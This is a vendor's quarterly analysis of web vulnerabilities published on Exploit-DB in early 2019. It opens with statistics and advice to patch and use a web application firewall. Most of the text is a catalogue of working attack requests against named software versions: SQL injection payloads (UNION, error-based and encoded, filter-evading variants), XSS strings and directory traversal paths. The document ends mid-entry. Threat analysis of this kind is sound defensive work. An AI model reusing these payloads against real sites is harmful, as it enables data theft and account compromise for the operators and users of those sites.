EDB Analysis Report (2019 Q1) - Penta Security Systems


1. Reports by vulnerability type

| Vulnerability | Reports |
|---|---|
| SQL Injection | 116 |
| XSS | 42 |
| Directory Traversal | 8 |
| File Upload | 4 |
| LFI | 3 |
| Total | 173 |

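2. Classification by risk level

| Risk level | Reports | Percentage |
|---|---|---|
| High | 15 | 8.67% |
| Medium | 42 | 24.28% |
| Low | 116 | 67.05% |
| Total | 173 | 100.00% |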

3. Status by attack difficulty

| Attack difficulty | Reports | Percentage |
|---|---|---|
| High | 6 | 3.47% |
| Medium | 38 | 21.97% |
| Low | 129 | 74.57% |
| Total | 173 | 100.00% |

4. Vulnerabilities by major software

| Software name (2 or more reports) | Reports |
|---|---|
| Joomla! Component | 12 |
| Netartmedia | 8 |
| Jettweb | 6 |
| DomainMOD | 4 |
| qdPM | 3 |
| osCommerce | 3 |
| Ask Expert Script | 2 |
| Zeeways | 2 |
| PHP Ecommerce Script | 2 |
| PHP Dashboards NEW | 2 |
| phpTransformer | 2 |
| CMSsite | 2 |
| XAMPP | 2 |
| SJS | 2 |
| WordPress Plugin | 2 |
| SuiteCRM | 2 |
| Roxy Fileman | 2 |
| Find a Place CMS Directory | 2 |
| Apache CouchDB | 2 |
| pfSense | 2 |
| Total | 64 |

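EDB Analysis Report (2019 Q1)

2019.01.01~2019.03.31: information on vulnerabilities published on Exploit-DB (http://exploit-db.com), classified by vulnerability type.

Summary of analysis (written by: Penta Security Systems Security Evaluation Team)

From January to March 2019, 173 vulnerabilities were published in the EDB Analysis Report.

The attack with the largest number of published vulnerabilities is SQL Injection. The software with the most published vulnerabilities was Joomla Component and Netartmedia, with 12 and 8 vulnerabilities respectively. The attacks carried out against Joomla Component software were SQL Injection. Even when this attack starts out as a low-difficulty one, once a vulnerability is found an attacker can run SQL Injection attacks that apply a variety of SQL queries to the vulnerable parameter, so in terms of risk it ranks as a very high-risk attack. To prevent these vulnerabilities, applying the latest patches and secure coding are recommended. However, perfect secure coding is not possible, and to maintain security continuously, implementing defense in depth with a web application firewall should be considered.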

[Charts: Reports by vulnerability type (SQL Injection, XSS, Directory Traversal, File Upload, LFI); Classification by risk level; Status by attack difficulty; Vulnerabilities by major software]

Date | EDB No. | Vulnerability class | Attack difficulty | Attack risk | Vulnerability name | Core attack code | Target program | Target environment

Date: 2019-01-02 | EDB No.: 46066 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Medium
Vulnerability name: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
Core attack code:
POST /10.0.100.24 HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD);
Target program: WordPress Plugin
Target environment: WordPress Plugin Adicon Server 1.2

Date: 2019-01-02 | EDB No.: 46067 | Vulnerability class: XSS | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Frog CMS 0.9.5 - Cross-Site Scripting
Core attack code:
POST /10.0.100.24/index.php? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Upgrade-Insecure-Requests: 1

username=<script>alert(1)</script>
Target program: Frog CMS
Target environment: Frog CMS 0.9.5

Date: 2019-01-07 | EDB No.: 46076 | Vulnerability class: XSS | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Embed Video Scripts - Persistent Cross-Site Scripting
Core attack code:
POST /10.0.100.24/index.php? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Connection: close
Upgrade-Insecure-Requests: 1

message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png
Target program: Embed Video Scripts
Target environment: Embed Video Scripts

Date: 2019-01-07 | EDB No.: 46077 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: High
Vulnerability name: All in One Video Downloader 1.2 - Authenticated SQL Injection
Core attack code:
POST /10.0.100.24/admin/?view=page- HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
Target program: All in One Video Downloader
Target environment: All in One Video Downloader 1.2

Date: 2019-01-07 | EDB No.: 46079 | Vulnerability class: XSS | Attack difficulty: Low | Attack risk: Low
Vulnerability name: LayerBB 1.1.1 - Persistent Cross-Site Scripting
Core attack code:
POST /10.0.100.24/index.php? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Upgrade-Insecure-Requests: 1

title=<script>alert('XSS')</script>
Target program: LayerBB
Target environment: LayerBB 1.1.1

Date: 2019-01-07 | EDB No.: 46080 | Vulnerability class: XSS | Attack difficulty: Low | Attack risk: Low
Vulnerability name: MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting
Core attack code:
POST /10.0.100.24/index.php? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Upgrade-Insecure-Requests: 1

user=<script>alert('XSS')</script>
Target program: MyBB OUGC Awards Plugin
Target environment: MyBB OUGC Awards Plugin 1.8.3

Date: 2019-01-07 | EDB No.: 46081 | Vulnerability class: XSS | Attack difficulty: Low | Attack risk: Low
Vulnerability name: PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting
Core attack code:
POST /10.0.100.24/index.php? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Upgrade-Insecure-Requests: 1

payload=<script>alert("XSS-Saurav")</script>
Target program: PLC Wireless Router
Target environment: PLC Wireless Router GPN2.4P21-C-CN

Date: 2019-01-07 | EDB No.: 46082 | Vulnerability class: XSS | Attack difficulty: Low | Attack risk: Low
Vulnerability name: phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Scripting
Core attack code:
GET /10.0.100.24/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Upgrade-Insecure-Requests: 1

db=<script>alert(1)</script>newdb=<script>alert(2)</script>collection=<script>alert(3)</script>
Target program: phpMoAdmin MongoDB GUI
Target environment: phpMoAdmin MongoDB GUI 1.1.5


Date: 2019-01-07 | EDB No.: 46084 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: High
Vulnerability name: MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection
Core attack code:
POST /10.0.100.24/charge/admin HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

Charge[user_name]=k&Charge[group_total]=1) AND EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT(ELT(2003=2003,1))),0x7170707071))--eaYu&Charge_page=1&ajax=charge-grid
Target program: MyT Project Management
Target environment: MyT Project Management 1.5.1

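Date: 2019-01-07 | EDB No.: 46172 | Vulnerability class: File Upload | Attack difficulty: Low | Attack risk: High
Vulnerability name: Roxy Fileman 1.4.5 - Unrestricted File Upload
Core attack code:
GET /10.0.100.24/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1
Target program: Roxy Fileman
Target environment: Roxy Fileman 1.4.5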

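Date: 2019-01-07 | EDB No.: 46172 | Vulnerability class: Directory Traversal | Attack difficulty: Medium | Attack risk: Low
Vulnerability name: Roxy Fileman 1.4.5 - Directory Traversal
Core attack code:
GET /10.0.100.24/fileman/php/download.php?f=%2FExploitDb%2FRoxyFileman-1.4.5-php%2Ffileman%2FUploads%2F%2F%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows/win.ini HTTP/1.1
Target program: Roxy Fileman
Target environment: Roxy Fileman 1.4.5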

Date: 2019-01-08 | EDB No.: 46095 | Vulnerability class: SQL Injection | Attack difficulty: High | Attack risk: Medium
Vulnerability name: Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection
Core attack code:
POST /10.0.100.24/doli/htdocs/admin/dict.php?id=16 HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 331

actionmodify=Modify&button_removefilter=Removefilter&button_search=Search&code=PL_NONE&entity=&from=&libelle=None&page=0&position=1&rowid=\%' AND EXTRACTVALUE(6385,CONCAT(0x5c,0x716b717871,(SELECT(ELT(6385=6385,1))),0x7176787171)) AND'%'='&search_code=94102&token=$2y$10$KhKjYSBlkY24Xl8v.d0ZruN98LAFOAZ5a5dzi4Lxe3g21Gx46deHK
Target program: Dolibarr ERP-CRM
Target environment: Dolibarr ERP-CRM 8.0.4

Date: 2019-01-10 | EDB No.: 46111 | Vulnerability class: SQL Injection | Attack difficulty: High | Attack risk: Medium
Vulnerability name: doitX 1.0 - 'search' SQL Injection
Core attack code:
GET /10.0.100.24/searchs?search=%45%66%65%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31,%76%65%72%73%69%6f%6e%28%29,%33%2c%34%2c%35,%36%2c%37%2c%38%2c%39%2c%31%30,%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35,%31%36%2c%31%37%2d%2d%20%2d&search_from=entries HTTP/1.1
Target program: doitX
Target environment: doitX 1.0

Date: 2019-01-10 | EDB No.: 46112 | Vulnerability class: SQL Injection | Attack difficulty: High | Attack risk: Medium
Vulnerability name: Shield CMS 2.2 - 'email' SQL Injection
Core attack code:
POST /10.0.100.24/shield/forgot.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 749
Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined
Target program: Shield CMS
Target environment: Shield CMS 2.2

Date: 2019-01-10 | EDB No.: 46113 | Vulnerability class: SQL Injection | Attack difficulty: High | Attack risk: High
Vulnerability name: Architectural 1.0 - 'email' SQL Injection
Core attack code:
POST /10.0.100.24/backoffice/forgot.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 749
Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined

Target program: Architectural
Target environment: Architectural 1.0


Date: 2019-01-10 | EDB No.: 46114 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: MLMPro 1.0 - SQL Injection
Core attack code:
POST /10.0.100.24/login.php?section=login HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 538
Cookie: PHPSESSID=e1js8vek57sgge2oso51do2255
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

username=%2d%31%27%20%55%4eI%4f%4e%20%2f%2a%21%31%31%31%31%31%53EL%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35%2c%36,%43%4f%4e%43%41%54%28%55%53%45%52%28%29%2c%30%78%32%64%2c%56%45%52%53%49%4f%4e%28%29%29%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36,%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2d%2d%20%2d&password=&submit=Login: undefined
Target program: MLMPro
Target environment: MLMPro 1.0

Date: 2019-01-10 | EDB No.: 46115 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Event Calendar 3.7.4 - 'id' SQL Injection
Core attack code:
GET /10.0.100.24/events_edit.php?id=%2d%31%30%33%31%27%20%2f%2a%21%31%31%31%311%55%4e%49%4f%4e%20%2a%2f%2f%2a!11111SELE%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37,8--%20- HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: Event Calendar
Target environment: Event Calendar 3.7.4

Date: 2019-01-10 | EDB No.: 46116 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Event Locations 1.0.1 - 'id' SQL Injection
Core attack code:
GET /10.0.100.24/events_edit.php?id=%2d%32%33%36%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31111%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Target program: Event Locations
Target environment: Event Locations 1.0.1

Date: 2019-01-10 | EDB No.: 46117 | Vulnerability class: SQL Injection | Attack difficulty: Medium | Attack risk: Low
Vulnerability name: eBrigade ERP 4.5 - SQL Injection
Core attack code:
GET /10.0.100.24/pdf.php?pdf=DPS&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4fM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4fNCA%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43AT(C%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52OM+%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+W%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54+%30%2c%31%29,%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+GR%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
Target program: eBrigade ERP
Target environment: eBrigade ERP 4.5

Date: 2019-01-10 | EDB No.: 46118 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Medium
Vulnerability name: OpenSource ERP 6.3.1. - SQL Injection
Core attack code:
POST /10.0.100.24/db/utils/query/data.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://10.0.100.24:1004
Referer: http://10.0.100.24:1004/
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Cookie: MneHttpSessionId8024=15471285865828
Host: 10.0.100.24:1004
Content-Length: 414
Accept-Encoding: gzip, deflate
Connection: close

sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test
Target program: OpenSource ERP
Target environment: OpenSource ERP 6.3.1.

Date: 2019-01-11 | EDB No.: 46119 | Vulnerability class: SQL Injection | Attack difficulty: Medium | Attack risk: Low
Vulnerability name: Adapt Inventory Management System 1.0 - SQL Injection
Core attack code:
POST /10.0.100.24/admin/login.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 291
Cookie: PHPSESSID=e23redq9bp28kar813ggnk4g87
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&password=%27: undefined
Target program: Adapt Inventory Management System
Target environment: Adapt Inventory Management System 1.0


Date: 2019-01-11 | EDB No.: 46122 | Vulnerability class: SQL Injection | Attack difficulty: Medium | Attack risk: Low
Vulnerability name: Joomla! Component JoomCRM 1.1.1 - SQL Injection
Core attack code:
GET /10.0.100.24/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=31%39%20A%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52OM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41T%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53E()%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3dDAT%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4fRMA%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __cfduid=d32095db21c106516d53cae46d08e3e291547158024; 5cccc826c28cb27e67933089ce2566a0=1ad52e59a11808d25fa5e93d022c74f3; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: Joomla! Component
Target environment: Joomla! Component JoomCRM 1.1.1

Date: 2019-01-14 | EDB No.: 46134 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Medium
Vulnerability name: i-doit CMDB 1.12 - SQL Injection
Core attack code:
GET /10.0.100.24/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1
Target program: i-doit CMDB
Target environment: i-doit CMDB 1.12

Date: 2019-01-14 | EDB No.: 46138 | Vulnerability class: SQL Injection | Attack difficulty: High | Attack risk: High
Vulnerability name: Modern POS 1.3 - SQL Injection
Core attack code:
GET /10.0.100.24/_inc/pos.php?query_string=Efe%27||(/*!11111SElecT*/+%27Efe%27+/*!11111FRom*/+/*!11111DuAl*/+/*!11111whERE*/+6=6+/*!11111anD*/+(/*!11111SEleCT*/+6+/*!11111FRoM*/(/*!11111SELECT*/+COuNT(*),/*!11111CONCAT*/(@@verSion,(/*!11111seleCT*/+(ELT(6=6,1))),/*!11111FLoOR*/(RAnD(0)*2))x+/*!11111FRoM*/+/*!12345InFOrMaTION_SchEmA.plUgINS*/+/*!11111grOUP*/+/*!11111by*/+x)a))||%27&action_type=PRODUCTLIST HTTP/1.1
Target program: Modern POS
Target environment: Modern POS 1.3

Date: 2019-01-14 | EDB No.: 46139 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Twilio WEB To Fax Machine System Application 1.0 - SQL Injection
Core attack code:
POST /10.0.100.24/login_check.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Cookie: PHPSESSID=5fd1dbc1e4c6b5876e1f44dbc157af9f
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

email=1&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&submit=Login: undefined
Target program: Twilio WEB To Fax Machine System Application
Target environment: Twilio WEB To Fax Machine System Application 1.0

Date: 2019-01-14 | EDB No.: 46141 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Live Call Support Widget 1.5 - SQL Injection
Core attack code:
GET /10.0.100.24/add_widget.php?wid=%2d%34%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e()%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Target program: Live Call Support Widget
Target environment: Live Call Support Widget 1.5

Date: 2019-01-14 | EDB No.: 46144 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Medium
Vulnerability name: Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection
Core attack code:
